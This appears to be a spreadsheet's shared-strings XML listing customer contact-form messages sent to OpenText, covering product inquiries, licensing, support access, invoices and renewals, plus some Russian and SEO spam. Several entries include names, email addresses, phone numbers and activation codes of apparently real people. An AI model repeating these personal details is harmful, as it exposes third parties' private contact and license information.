    <t>Would like an overview of Documentum.</t>
  </si>
  <si>
    <t>Pleasure,_x000D_
I am Lucas Rodrigues de Souza Zanella graduate student in economics at the Federal University of Rio de Janeiro (UFF). At the moment with the help of an advisor, Dr. Professor Edson Barreto, I am developing an academic project in which I analyze the relationship of foreign direct investment between Brazil and Canada._x000D_
In this research it was verified that this company has great relevance in this study, in this way, I need some information to complete the article:_x000D_
- Year of company arrival in Brazil_x000D_
- Billing for the year 2016 (or the last years) and the number of employees in Brazil._x000D_
  Please, if possible, make this information available._x000D_
Thanks for listening.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I am looking for online training class recommendations for 2 topics:_x000D_
(1) Basic workflow development and troubleshooting for Content Server 10.5_x000D_
(2) Content server user and system administration._x000D_
_x000D_
Thanks, Susan Bogart </t>
  </si>
  <si>
    <t xml:space="preserve">Need to setup an account for OpenText Active Catalogue to transmit items to Sears Holding. </t>
  </si>
  <si>
    <t>Can't login to support site, my login ID (tony.hardecki@dxc.com) is recognized (email is sent with link) but password reset fails repeatedly.  First time trying to login since Dell/EMC transition.  I am a DXC Technology employee contracted by ConvaTec to support Documentum.  Please help.</t>
  </si>
  <si>
    <t>We are planning to migrate the existing Mobius documents/Reports in to ImageRight. I am wondering OpenText provide any consulting services for the migration. We welcome any better solutions.</t>
  </si>
  <si>
    <t xml:space="preserve">We start working for Customer Belk.  And required to setup EDI thru you. Please advise what you need to setup GXS Catalog ID and to give Belk access to our GXS catalog after setup. Waiting for your instruction._x000D_
_x000D_
Thank you_x000D_
Yohan_x000D_
</t>
  </si>
  <si>
    <t>We would like to talk with a sales person about an automated AP solution.</t>
  </si>
  <si>
    <t>Upgrade Gupta TD 1.5 to most recent version</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to use the RightFax API in a C# project so that my users can see the fax history.  Need support in getting the API DLL to work properly.  </t>
  </si>
  <si>
    <t>I am attempting to download the free brava reader but I am not receiving the email link for download after filling out the form</t>
  </si>
  <si>
    <t xml:space="preserve">havent received the email to log on and download the free reader </t>
  </si>
  <si>
    <t>Licensing question. Can the Exceed license and software be transferred from one machine to another machine (virtual or physical) without the need to purchase a new license? Can you provide a copy of the EULA for Exceed?</t>
  </si>
  <si>
    <t>We have a pretty urgent need for the forms piece (web forms or eforms), that capture data and feed into OpenText. We don't even know where to begin with building out a form. Any assistance, or pointing us in the direction of tutorials, is great appreciated. Thanks!</t>
  </si>
  <si>
    <t>maintenance ran out and can't seem to find out how to renew</t>
  </si>
  <si>
    <t xml:space="preserve">completing the form, but not receiving the email to the free brava pdf download.  </t>
  </si>
  <si>
    <t>Hello,_x000D_
I tried several times to access the MySupport Area but I am always told that my mail address must be confirmed. Although I already confirmed my address some times, I still don't have access. Can you please check if there is anything else to be done to unlock my account for MySupport?_x000D_
_x000D_
One thing I need is access to license keys order with: " Your OpenText Order # 8000005915 PO Number: 182 / 4090008436" (received by: christian.ziegler@fresenius-netcare.com). If you need confirmation by anyone else from Fresenius Netcare I'd like to ask you to contact them directly._x000D_
_x000D_
Thank you,_x000D_
Hilmar Bunjes</t>
  </si>
  <si>
    <t>Validate Windows 10 Support for Rightfax</t>
  </si>
  <si>
    <t>renew license for Brava reader</t>
  </si>
  <si>
    <t>Purchase questions.</t>
  </si>
  <si>
    <t>[url=https://kwa-gold.ru/kategorii/myagkaya-mebel-4sis/][img]https://s8.hostingkartinok.com/uploads/images/2017/09/0b58f9893110900805b9f59b7b1a9d08.jpg[/img][/url] _x000D_
 _x000D_
Эти модели наиболее функциональны, потому что Оригинальность является одним из плюсов Схема переоборудования съёмной полки в винную Подвесные кресла для дома, фото Но самое главное кресло, подвешенное к потолку или к каркасу, должно быть удобным, поэтому перед покупкой испытайте его не только на прочность, но и на комфортность Разновидностей подвесных кресел очень и очень много Подвесные кресла своими руками 40 вдохновляющих идей и пошаговый процесс создания Искусственый ротанг, плоское плетение Алюминиевый каркас Стэкируемое, 26 шт в стэке По В процессе производства мебели не используются химические компоненты, а значит, садовая мебель полностью безопасна для детей  [url=https://kwa-gold.ru/kategorii/sostarennaya-mebel/]https://kwa-gold.ru/kategorii/sostarennaya-mebel/[/url] ну и конечно чехол на скамью купить. Просто выберите удобный способ обратной связи.</t>
  </si>
  <si>
    <t>Interested in finding out case management capabilities and possibly a live/web demo.</t>
  </si>
  <si>
    <t xml:space="preserve">Bought Brava Desktop, cant get to the download link._x000D_
I have set up my account and verified my e-mail address, and the support page still says no access and request confirmation e-mail_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">can we get an update link?_x000D_
</t>
  </si>
  <si>
    <t>We issued a check last week in the amount of $131.00.  It was mailed to PO Box 791247  Baltimore, MD  21279.  It was returned to us today.  I'm wondering if there has been a change in your address.  Please advise of any changes so that we may remit our payment.  Thank you!</t>
  </si>
  <si>
    <t>Hi! Could you please clarify to who in your company can we refer with authorization letter request?_x000D_
_x000D_
Thanks in advance!</t>
  </si>
  <si>
    <t xml:space="preserve">For when will be an update for IOS11?_x000D_
Cant use the app._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are in the process of scoping for a bank wide electronic records and documents management system. In that regard we are on the lookout for vendors who can provide a solution that matches our needs._x000D_
_x000D_
In our research we have come across your contact as an organization which can provide the OpenText ECM Solution which is one of our preferred options._x000D_
 _x000D_
We expect this system to cover all our branches and units in terms of records and document management as well as workflows from capturing, storage until disposal in a uniform and standardised manner._x000D_
 _x000D_
We also need the system to allow for a back scanning of documents housed in our  Records-Centre and convert them into digital format._x000D_
  _x000D_
May you advise if your systems can benefit us and how best can we engage and elaborate to each other._x000D_
_x000D_
We are in the process of scoping for a bank wide electronic records and documents management system. In that regard we are on the lookout for vendors who can provide a solution that matches our needs._x000D_
_x000D_
In our research we have come across your contact as an organization which can provide the OpenText ECM Solution which is one of our preferred options._x000D_
 _x000D_
We expect this system to cover all our branches and units in terms of records and document management as well as workflows from capturing, storage until disposal in a uniform and standardised manner._x000D_
 _x000D_
We also need the system to allow for a back scanning of documents housed in our  Records-Centre and convert them into digital format._x000D_
  _x000D_
May you advise if your systems can benefit us and how best can we engage and elaborate to each other._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Looking for electronic Quality Management System / Document Management System</t>
  </si>
  <si>
    <t>We have an enterprise license for ProVision, but I cannot find a place to download the software</t>
  </si>
  <si>
    <t>I tried 4 times to download the Reader file with no responding email as indicated by the web page.</t>
  </si>
  <si>
    <t>We are looking for a product that will facilitate the literature review process.  We are a financial services firm and all public-facing documents must be approved prior to use.  Do you have a module or separate application that will accommodate the capture of the reviews and approvals?  Thanks, Jackie</t>
  </si>
  <si>
    <t>I need to download RightFax 16.2 in preparation for a server migration tomorrow morning 9am GMT. I have created an OpenText Connect account but do not have access to My Support. Please can I be granted access.</t>
  </si>
  <si>
    <t>Need cloud based  product to fax the documents</t>
  </si>
  <si>
    <t>I have sent two emails from my email to a fax machine and they are not arriving. I sent to 336-478-2246 and 336-854-2689. My fax number is 336-383-1904, and i am using the @faxmail.com email address.</t>
  </si>
  <si>
    <t>Would like to apply for the job opening</t>
  </si>
  <si>
    <t>I had a maintenance contract for my Brava software. It ran out over a year ago. Please can you let me know how to renew it. Many thanks Tim</t>
  </si>
  <si>
    <t>Bonjour _x000D_
on aimerait avoir un dosucment de l'un de vos document en français si c'est possible._x000D_
opentext-product-overview-co-content-suite-platform-en</t>
  </si>
  <si>
    <t>Guten Tag,_x000D_
_x000D_
wir sind ein Anbieter für Tablet-basiertes Point of Sales / Experience Feedback. Unsere Kunden sammeln PoS/E Feedback mittels von uns bereitgestellten Terminals und erhalten über unsere Auswertungsplatform Einsicht in das Erlebnis ihrer Kunden und können entsprechend Maßnahmen veranlassen um das Erlebnis zu verbessern._x000D_
_x000D_
Wir würden unseren Kunden die Auswertung der Textfeedbacks erleichtern in dem wir diese computergestützt nach Stimmung und Thema analysieren. Dazu sind wir aktuell auf der Suche nach einer guten Text-Analyse Lösung._x000D_
_x000D_
Wäre OpenText Discovery(?) ein Produkt das hierfür in Frage käme? Wenn ja würde ich gerne mehr darüber erfahren und kann Ihnen auch noch einmal genauer in einem Telefonat unsere Anforderungen/Vorhaben schildern._x000D_
_x000D_
Mit freundlichen Grüßen,_x000D_
Kai Kuchenbecker</t>
  </si>
  <si>
    <t>My name is Tiffany Alford with CISIVE. We are a professional fact finding organization, which represents a number of major corporations. One of our clients has requested to verify employment with your company. What is your procedure for Employment Verifications? Do you have a Human Resources or Payroll department we can contact? Your cooperation in furnishing a prompt reply will be greatly appreciated. Thank you for your assistance in this matter._x000D_
_x000D_
Kind Regards,_x000D_
Tiffany Alford_x000D_
Research Associate_x000D_
Cisive, formerly CARCO Group, Inc._x000D_
1030 Lillington Highway_x000D_
Spring Lake, NC 28390 USA_x000D_
Phone: 631-862-9300 ext. 218</t>
  </si>
  <si>
    <t>Hello,_x000D_
 _x000D_
How are you? Hope you are fine._x000D_
 _x000D_
I have been checking your website quite often. It has seen that the main keywords are still not in top 10 rank. You know things of working; I mean the procedure of working has changed a lot._x000D_
 _x000D_
So I would like to have opportunity to work for you and this time we will bring the keywords to the top 10 spot with guaranteed period._x000D_
 _x000D_
There is no wondering that it is possible now cause, I have found out that there are few things need to be done for better performances (Some we Discuss ,in this email). Let me tell you some of them -_x000D_
 _x000D_
1. Title Tag Optimization_x000D_
2. Meta Tag Optimization ( Description , keyword and etc )_x000D_
3. Heading Tags Optimization_x000D_
4. Targeted keywords are not placed into tags_x000D_
5. Alt / Image tags Optimization_x000D_
6. Google Publisher is missing_x000D_
7. Custom 404 Page is missing_x000D_
8. The Products are not following Structured markup data_x000D_
9. Word-Press is not installed properly, in the blogs_x000D_
10. Website Speed Development (Both Mobile and Desktop )_x000D_
Please check via Google Developer -_x000D_
https://developers.google.com/speed/pagespeed/ _x000D_
11. Favicon needs to be changed too._x000D_
12. Off –Page SEO work_x000D_
 _x000D_
Lots are pending…………….._x000D_
 _x000D_
You can see these are the things that need to be done properly to make the keywords others to get into the top 10 spot in Google Search &amp; your sales Increase._x000D_
 _x000D_
Also there is one more thing to mention that you did thousands of links that time for your website,_x000D_
which are considered as spam after Google roll outs several updates of Panda and penguin. We need to remove them too._x000D_
 _x000D_
Sir, please give us a chance to fix these errors and we will give you rank on these keywords._x000D_
 _x000D_
Please let me know if you encounter any problems or if there is anything you need. If this email has reached you by mistake or if you do not wish to take advantage of this free advertising opportunity, please accept my apology for any inconvenience caused and rest assured that you will not be contacted again._x000D_
 _x000D_
Man</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Friends,_x000D_
_x000D_
One of our customers need Exceed 1 year Maintenance Renewal for 100 users _x000D_
_x000D_
Can you give me price and availability info?_x000D_
_x000D_
Kind regards_x000D_
</t>
  </si>
  <si>
    <t>Dear Sir or Madam,_x000D_
_x000D_
we are looking for an on-premise solution for the management of our video metadata. A crucial requirement is that is agnostic to the actual storage solution, since it has to integrate with out existing NAS structure. The amount of raw video produced is around 20TB p.a._x000D_
_x000D_
Please kindly provide further information about suitability of OpenText solution for our needs and the pricing information._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Dimitri Vorona.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
wir würden gerne die Wartung von den insgesamt 7 vorhandenen GUPTA Team Developer Lizenzen verlängern. Bitte nennen Sie uns Partner, wo wir anfragen können. Viele der auf Ihrer Internetseite genannten Unternehmen konnten uns kein Angebot unterbreiten._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Chris Sondermann</t>
  </si>
  <si>
    <t>We want to Preliminary understanding the product of OpenText. If you can, please send the introduction of OpenText for me, thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there_x000D_
I have to reinstall Report Builder 6.0, need to activate again. Please see the PMC and PAC Codes Below. Need Product activation Key_x000D_
PMC 59432B27-B59C13EC-C20E6792-04320FA5_x000D_
PAC 10077983-0948871E-E0BCFE82-90B38B66_x000D_
_x000D_
Regards._x000D_
ENGIN ABAT_x000D_
PRODUCT SUPERVISOR ,  STOCK &amp; INVENTORY SYSTEMS_x000D_
PROTEL A.S._x000D_
T. +90 850 333 77 85 _x000D_
F. +90 212 275 21 31_x000D_
PROTEL.COM.TR_x000D_
</t>
  </si>
  <si>
    <t>Hi Guys,_x000D_
_x000D_
We need a demo for your entire ECM Suite of products. Please advise for the next step. Thank you._x000D_
_x000D_
Regards,_x000D_
A.Z</t>
  </si>
  <si>
    <t>BIRT iHub can utilize Active Directory or LDAP to externalize user authentication._x000D_
I can not find how to load the file : ConfigureDirService.tgz._x000D_
Thanks for your help</t>
  </si>
  <si>
    <t>Invoices_x000D_
Can you pls send me again a copy of the following invoices?_x000D_
9000166627, 9000166628, 9000161137_x000D_
Thank you.</t>
  </si>
  <si>
    <t>I am having issues getting OpenText Socks work, I have created a profile with the necessary information to connect to a socks server then I connect with that information but the pages I am trying to access do not load._x000D_
_x000D_
You might think that my configurations have something wrong, but no, I have use them with Proxifier and with that app I am able to connect perfectly and reach the resources I need to access, so there seems to be missing some kind of setting on OpenText to work propertly. The version avaliable for me to downloand through IBM Software server is 14.0. Please advise</t>
  </si>
  <si>
    <t>I would like to discuss latest functionality of eRoom software and proposal for obtaining license w/users.</t>
  </si>
  <si>
    <t xml:space="preserve">What would a huge increase in relevant traffic mean for your business? If I could greatly increase the amount of customers who are interested in your products and services, wouldn't you be interested_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm interested in using Provision to flow out the as is and to be process for a Lean Six Sigma project at one of our clients. </t>
  </si>
  <si>
    <t xml:space="preserve">Guten Tag,_x000D_
ich nutze Exceed 14.0.4.478 um von Window 7 aus auf die Gnome-Oberfläche einer UNIX-Workstation zuzugreifen. In der Vergangenheit hatte ich das Gnome-Hintergrundbild transparent geschalten um gleichzeitig komfortabel mit Windows und UNIX-Anwendungen arbeiten zu können. Dazu habe ich unter Windows einen Rechtsklick auf das Exceed-Symbol unten rechts bei der Uhr gemacht und dann unter "Extras" - "Backdrop anzeigen" den Haken entfernt. In ihrem User's Guide bezeichnen Sie dieses Menü als "Exceed Menu"._x000D_
_x000D_
Jetzt wurde von unserer IT mein Rechner ausgetauscht. Nachdem Exceed wieder eingerichtet wurde fehlt jetzt jedoch das Exceed-Symbol unten rechts bei der Uhr. Ich bin deshalb im Moment nicht im Stande das Gnome-Hintergrundbild transparent zu schalten, was mich sehr stört._x000D_
_x000D_
Können Sie mir weiterhelfen?_x000D_
_x000D_
Mit freundlichen Grüßen,_x000D_
Sebastian Taron_x000D_
</t>
  </si>
  <si>
    <t>We have been your reseller for Guidance and Tableau for many years.  We now have customers interested in Opentext products who are looking for quotes.  Please advise if you will accept us as your reseller and what we need to do to get a priceless. Regards_x000D_
Sorrell Lambie</t>
  </si>
  <si>
    <t>Need to know about ProVision licensing cost</t>
  </si>
  <si>
    <t xml:space="preserve">necesitamos los precios para realizar un sizing a nuestros servidores de cara al upgrade de nuestra herramienta version 10.5 a 16.x_x000D_
_x000D_
por favor contactarme. </t>
  </si>
  <si>
    <t xml:space="preserve">Contact attempt 2:_x000D_
We were awarded a contract with The Department of Veterans Affairs and are required to test products for 508 compliance for inclusion on the Technical Reference Model (TRM) within the VA.  We are reaching out to gain access to TeamSite in order to test the product for 508 compliance.  We will need one license and access for 30 – 60 days in order to complete all tests._x000D_
_x000D_
Please let me know if you can provide more details on how to gain access to TeamSite._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We received Maxor report on 10/16/17 with several items on like Advair250, Brio...however we did not receive that order. Burlington Drugs customer service said that 340B order was not submitted to them. Please look into it and let us know. Call us and speak with Kaitlyn or email me back. Thank you </t>
  </si>
  <si>
    <t xml:space="preserve">I am interested in your Taxonomy Management and indexing tools._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I am looking to purchase support on an old Rightfax server for a customer and need your advise please.</t>
  </si>
  <si>
    <t>I'm working on upgrading my agency to Redact-It Desktop 16.2_x000D_
_x000D_
I can't have Redact-It 2.3 down while I test and evaluate 16.2._x000D_
I need both up and running together._x000D_
I'm trying to procure a separate license server for 16.2._x000D_
In the meantime is there a process or instructions for installing the license server and what do you need from us for a license file?_x000D_
I have two license files - one is for 5 licenses and one is for 68._x000D_
_x000D_
Last time (about a year and a half ago) I know you need the IP address of the server. But what else do you need?_x000D_
Are these downloadable or do you send them to me? How do I get these files, please?_x000D_
_x000D_
Any help, guidance, assistance would be greatly appreciated._x000D_
_x000D_
Thank you._x000D_
_x000D_
Kirby</t>
  </si>
  <si>
    <t>Need Certificates of Participation from previous OpenText courses._x000D_
_x000D_
Hi, _x000D_
  I have a potential contract offer that is dependent on me meeting a mandatory requirement on a government grid for OpenText coursework._x000D_
In the past, I've attended the following courses:_x000D_
* What's new in Content Server 10.0_x000D_
* Upgrading Customizations for Content Server 10.0_x000D_
* Content Server Web Services Fundamentals_x000D_
* OpenText Records Management 10.2.x_x000D_
_x000D_
I've never in a million years thought I'd need these, but for each of the above, I need a certificate of participation.  I had one for each before, but I can't for the life of me find any of them._x000D_
Thanks in advance_x000D_
-Hugh</t>
  </si>
  <si>
    <t xml:space="preserve">Today I bought the student version of Open Text Exceed and installed it my laptop. _x000D_
When I run this program, I found that expiry date is 8/31/2018 (319 days left)_x000D_
Why expiry date is less than a year (365 days)?_x000D_
_x000D_
Thanks_x000D_
_x000D_
Hyun_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We are starting a wholesale pharmaceutical distribution center and third party logistics warehouse. Evaluating B2B EDI systems.</t>
  </si>
  <si>
    <t>[url=http://viripit.ru/img/algebra.gif][img]http://viripit.ru/img/algebra.gif[/img][/url] _x000D_
Ребята кто знает где сейчас подешевле купить такой учебник по матетматике?</t>
  </si>
  <si>
    <t xml:space="preserve">I'd appreciate a contact to forward a currently open RFP for HealthEquity to. </t>
  </si>
  <si>
    <t>I am currently looking for a solution/system for our customer communications (notifications). I came across your Customer Communications Management solution would like to have a chat with your representative about Open texts solutions that may fit our need.</t>
  </si>
  <si>
    <t>Avoir plus d’information sur OpenText Intégration Center si possible la documentation concernant la présentation du produit</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am interested in knowing if you have experience replacing Extol Secure AS2 software on the iSeries, and have interfaced AS2 files with Extol Integrator._x000D_
Thanks,_x000D_
Kent</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,_x000D_
 _x000D_
Could you please advise if you’re providing Open Text Content Server Administrator Certification Program – OTCSSA in Oman or Dubai._x000D_
 _x000D_
If you do, could you please provide the date, location and price._x000D_
 _x000D_
Kindly reply._x000D_
 </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am contacting you in regards to finding out which version of Attorney Desktop is compatible with Windows 10.  Currently where I work we are using version 4.21.0307 of Attorney Desktop.  Please let me know if this version is compatible with Windows 10 and if it isn't, then what version is.  _x000D_
_x000D_
Thank you,_x000D_
Natalie</t>
  </si>
  <si>
    <t>hello i am trying to find out the price plan for secured fax that's hippa compliance.  thanks.. 150 fax a month</t>
  </si>
  <si>
    <t>We are trying to find monthly or annual cost to use the catalog for our edi system.</t>
  </si>
  <si>
    <t>I have registered for enterprise world 2018 conference and it is my first time conference registration,  and after paid fees i am requesting for invitation letter and the invoice but no one responding enthusiastically,  in this case if you do not want to provide invitation letter please cancel my registration and refund my money._x000D_
I am totally frustratedwith communicating with u</t>
  </si>
  <si>
    <t xml:space="preserve">Can you advise what is cost for encase software ? </t>
  </si>
  <si>
    <t>Have not received link for Free Brava Reader via email. Requested twice yesterday and still to not have it as of today. Please advise, thank you.</t>
  </si>
  <si>
    <t>I have requested the link to download the free Brava Reader and have not received a response.</t>
  </si>
  <si>
    <t>Trying to access Captiva 7.6 release notes but my access is denied.</t>
  </si>
  <si>
    <t>request partner contact in egypt</t>
  </si>
  <si>
    <t>Hi, we are searching a BI tool for data analysis with several data source (oracle, sql server,XLS..), interactive dashboard, reporting with busting function ,PDF sent by mail, shceduling, mobile. Can you contact me in order to see if your tool will reply to our needs? Best regards, Marylène</t>
  </si>
  <si>
    <t>I have submitted the request for the free download and have not received a response for the "link"</t>
  </si>
  <si>
    <t xml:space="preserve">Created user account successfully and confirmed the same by email as well. But getting message "Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us._x000D_
_x000D_
Please click on the link below to complete the process"  when accessing a link_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">To the HR/Recruitment team_x000D_
_x000D_
I am writing to express my interest in working for your company._x000D_
_x000D_
I am a dedicated, business focused HR Professional with over 15 years generalist HR experience, gained across multiple industries, including pharmaceutical, high-tech and legal. I am now looking for my next challenge. Whilst ideally this will be a  permanent position, I would also open to contract/consulting opportunities. _x000D_
_x000D_
During my career I have managed projects and initiatives in change management, M&amp;A, employee engagement, talent acquisition, performance management and succession planning._x000D_
 _x000D_
I am adaptable and flexible with the ability to communicate at all levels across the organisation and I thrive in fast paced environments._x000D_
_x000D_
I believe I can be a valuable asset to your team and would welcome the opportunity to discuss my experience in more detail. _x000D_
_x000D_
Thank you in advance for your consideration._x000D_
_x000D_
_x000D_
Best Regards_x000D_
Dharshini Sabaratnam _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I submitted a concern last week and I haven´t have an answer yet, I tried to contact but the numbers you have does not complete the call, I need assistance to purchase a license </t>
  </si>
  <si>
    <t>I need a full data sheet, spec sheet for Exceed On Demand for IT security review.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Dear service team,_x000D_
_x000D_
_x000D_
I am doing an initial  research for a big company (8000 total employees) to choose a new Knowledge Management System. Please help me with requested information to get to know your product._x000D_
_x000D_
_x000D_
If we use your software, please describe:_x000D_
_x000D_
1) How can an article/knowledge be added to the platform/knowledge base? Is there a publication process and how does it look like?_x000D_
_x000D_
2) Is there a feedback/evaluation system for articles/knowledge? Can employees rate, rewrite, request the deletion or request further information of articles/knowledge? What are the processes?_x000D_
_x000D_
3) Can employees use filters/segmentation systems to focus their article/knowledge requests on specific topics? We have many departments and each one needs specific information.  However authorization systems and the administration of roles/access is complicated. Our employees should have access to all knowledge but specific department knowledge should be segmented for them._x000D_
_x000D_
4) Is there a communication system from the employer to the employees via the platform? Like hot news, alert or activity feed on the platform._x000D_
_x000D_
_x000D_
Please answer me as soon as possible. You can also add links to the questions if they lead to an answer._x000D_
_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Marco Hans_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning, Can you please provide pricing for the following items?_x000D_
NAVOCEANO, located at Stennis Space Center, Mississippi is conducting Market Research for Open Text Hummingbird Connectivity Software Maintenance Support. Draft requirements below:_x000D_
_x000D_
12 month software support to maintain and update for the following parts:_x000D_
Part #	Description	Est Qty._x000D_
EXMP1550701	Exceed MP ML    	151_x000D_
EXMP1551701	Exceed XDK MP ML          	10_x000D_
SPMP1570701	 Secure Shell MP ML	39_x000D_
_x000D_
Software Support shall include:_x000D_
Contractor shall provide all technical software and firmware updates for covered systems over coverage period._x000D_
Telephone and online technical support (24 hour per day, 7 day per week, 365 days per year) for identifying, verifying, reporting and resolving problems, and technical questions_x000D_
Knowledgebase access_x000D_
Software updates and maintenance releases_x000D_
Documentation of software updates and upgrades including documentation updates, field notices, new manuals and customer application notes_x000D_
Updates shall address items including:_x000D_
		•	bug fixes_x000D_
		•	software defects_x000D_
		•	software and firmware enhancements/improvements_x000D_
		•	work-around procedures for reported software defects_x000D_
		•	critical adjustments_x000D_
		•	technical evaluation of the systems  _x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for a reporting solution to OEM with our Contact Centect Software products to cover: pixel perfect reporting, real time monitors, dashboards, adhoc reporting, BI and Analytics. </t>
  </si>
  <si>
    <t>Looking to implement AP automation solution.</t>
  </si>
  <si>
    <t>Je n'arrive pas à vous contacter par téléphone_x000D_
et j'aurai besoin d'une copie du contrat , mon numéro de client est le 87126</t>
  </si>
  <si>
    <t xml:space="preserve">На нашем сайте вы можете найти и загрузить последнюю версию прошивки и программного обеспечения для мигания телефонов разных моделей.  _x000D_
 _x000D_
&lt;a href=http://firmware-portal.com/33066-acer-aspire-5530g-602g16mi.html&gt;http://firmware-portal.com/33066-acer-aspire-5530g-602g16mi.html&lt;/a&gt;_x000D_
 _x000D_
[url=http://firmware-portal.com/21628-samsung-ps-63p76fdr.html]http://firmware-portal.com/21628-samsung-ps-63p76fdr.html[/url]_x000D_
</t>
  </si>
  <si>
    <t>i used to talk with maria zaballos for Documentum renewals. who is replacing her? thank you in advance, K. Karavanis, mobile phone +306944577801</t>
  </si>
  <si>
    <t>Please can you confirm the End of Life support date for Opentext InfoFusion Integration Center version 10.3</t>
  </si>
  <si>
    <t>brava reader license expired but email requested is not being received with link to update; can you please send it to me? have tried 4 times now. many thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
_x000D_
Nous vous contactons car nous souhaiterions lancer le chantier visant à nous mettre en conformité avec le RGPD._x000D_
_x000D_
Nous entendons initier rapidement ce projet sur l’ensemble du groupe Primonial et souhaiterions avoir une idée des tarifs que vous pourriez être amené à appliquer pour nous accompagner tout au long des différentes étapes vers la mise en conformité._x000D_
_x000D_
A titre d’information, nous vous précisons que le groupe Primonial a une trentaine d’années d’existence, il se compose d’une quinzaine de sociétés, certaines ayant une activité de société de gestion, d’autres de conseil en gestion de patrimoine (en BtoB ou BtoC)._x000D_
Le périmètre à couvrir serait l’ensemble de ces sociétés._x000D_
_x000D_
Nous avons désigné en interne un DPO qui pourrait éventuellement être votre interlocuteur si vous avez besoin de quelques données techniques pour effectuer un chiffrage approximatif (nous ne parlons pas encore de devis, vous l’aurez compris). _x000D_
_x000D_
Nous vous remercions de bien vouloir nous fixer un premier ordre d’idée, ce projet devant être doté en commission de budget dans les prochains jours._x000D_
_x000D_
Bien cordialement_x000D_
</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
Die PROFIMARKETING GmbH ist spezialisiert auf das Thema CRM. Im Zuge dessen ergibt sich wiederholt der Bedarf, Kunden einerseits zum Thema MDM zu beraten, andererseits bitten uns Kunden ganz konkret um Marktüberblick MDM._x000D_
_x000D_
Wir sind an mehr Information zu Ihrem MDM interessiert._x000D_
_x000D_
Vielen Dank im Voraus_x000D_
_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
Fabian Szabo</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team,_x000D_
We are looking for high level approach of the tool that we can leverage for our form migration from Forms3.0 to higher version forms\java \ADF forms._x000D_
We are interested in purchasing the licensed tool to do the conversion ourselves. Kindly suggest the feasibility for the same. Also will it be possible for you to provide a trial version tool for us to do a POC for the conversion._x000D_
_x000D_
1 .Upgrade:- Oracle Forms 3.0 to Forms 6i (or Higher Version)_x000D_
2. Migration:- Orcale Forms 6i (or Higher Version) to ADF/JAVA/APEX._x000D_
_x000D_
we have total 750 oracle forms 3.0 , 450 reports and Oracle 7  database._x000D_
_x000D_
Please let me know ASAP If you need more inputs form our side_x000D_
_x000D_
_x000D_
_x000D_
Thanks &amp; Regards,_x000D_
Sarath K,_x000D_
DXC Technology India Private Limited ._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">we are looking for documentum enterprise content management platform tools (OpenText)._x000D_
It will be very helpful if you kindly share us what will be the procedure to purchase it and what are the version are available for the same. And also we need quotation for the same. </t>
  </si>
  <si>
    <t>Registration mail did not arrive</t>
  </si>
  <si>
    <t>We need information about licensing and price details about document management software(OpenText).</t>
  </si>
  <si>
    <t xml:space="preserve">(urgent) To find vendors that can provide solution to support data transfer through AS2 protocol. </t>
  </si>
  <si>
    <t>Hi,_x000D_
We have been working with TeamSite for a long time and have developed an integration for translating contents from TeamSite. We used to have access to the development licenses and support. However, I cannot access it anymore. Can you please let me know what is required to enable the access again?_x000D_
_x000D_
Thank you,</t>
  </si>
  <si>
    <t>I will like to register a cosmetic products.</t>
  </si>
  <si>
    <t>Hello! I need to open a support ticket for our installation of Documentum Content Server 7.1. We should have support for that, but it is not an option under my user profile on your site. Previously I would submit a ticket through the EMC site and it would make it to the correct engineer, now I don't see that option. Please enable my support, or let me know what steps I need to take. Thank you!</t>
  </si>
  <si>
    <t>I would like to download the software and my license I paid for. Inyour email you refer to "accounts" in the top menu. But:  there is not such an item._x000D_
This is a shame. So please give me soon access tot the program, and correct this in your website.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, We need to obtain the updated W-9 form as the one we have is an old version. Please email it to me at nnakagawa@mhtny.com. Thank you </t>
  </si>
  <si>
    <t xml:space="preserve">We currently use the DAM solution but we are looking to store "raw" assets as well and are looking for a storage solution </t>
  </si>
  <si>
    <t xml:space="preserve">We recently received a letter from Kohl's stating they are requiring the use of a UPC catalog. We'd like more information on pricing and structure, please. We also emailed stevewil@opentext.com. </t>
  </si>
  <si>
    <t>We have a laptop using a Brava Desktop Tx license, we need to transfer it to a new laptop due hardware issues, I need to know the standard procedure to transfer it from the old one to the new one. _x000D_
Thank you</t>
  </si>
  <si>
    <t>Interesting in your CCM solution. Replacing Oracle iStream as part of our System Transformation.</t>
  </si>
  <si>
    <t>In process of evaluating vendors for next gen CCM system . This process will move very fast. I have worked with HP Extreme before so reaching out to see the current capabilities within the insurance space.</t>
  </si>
  <si>
    <t>Who supports documentum? Can you please provide us contact details? We need some help with documentum.</t>
  </si>
  <si>
    <t>Hi,_x000D_
I would like to get a quote for Opentext. What i would like to do is digitized our old files and update everything.</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for a reporting pixel-perfect, dashboard, ad-hoc, BI / Analytics reporting platform to OEM in our Software Products  </t>
  </si>
  <si>
    <t>What services to you provide my company?  I just received an invoice for an annual maintenance contract.</t>
  </si>
